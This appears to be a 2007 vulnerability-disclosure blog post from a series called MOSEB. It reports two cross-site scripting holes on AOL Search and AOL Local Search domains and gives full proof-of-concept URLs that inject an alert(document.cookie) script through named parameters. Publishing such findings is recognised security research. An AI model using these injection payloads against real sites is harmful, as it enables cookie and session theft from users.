MOSEB-22 Bonus: Vulnerabilities in AOL Search

22:58 23.06.2007

New bonus vulnerabilities in AOL Search. In this case vulnerabilities at others domains, than in MOSEB-22: Vulnerability at search.aol.com.

The vulnerabilities are at AOL Search (aolsearch.aol.com - it’s another version of AOL Search) and at AOL Local Search (http://local.aol.com). First one I found 05.06.2007 and it is Cross-Site Scripting hole.

XSS:

The vulnerability is in a parameter:
http://aolsearch.aol.com/aol/recent?invocationType=recentSearchMaint&a=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Second one, which sent me Yorn 19.06.2007, it is Cross-Site Scripting hole.

XSS:

The vulnerability is in near parameter:
http://local.aol.com/aol/localaddress?choice=results&near=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: recent search history and local search can be dangerous.

Note, that AOL engine use Google search engine. So Google also responsible for this vulnerabilities (as for their own MOSEB-15, MOSEB-15 Bonus and MOSEB-20 Bonus).


Leave a Reply

You must be logged in to post a comment.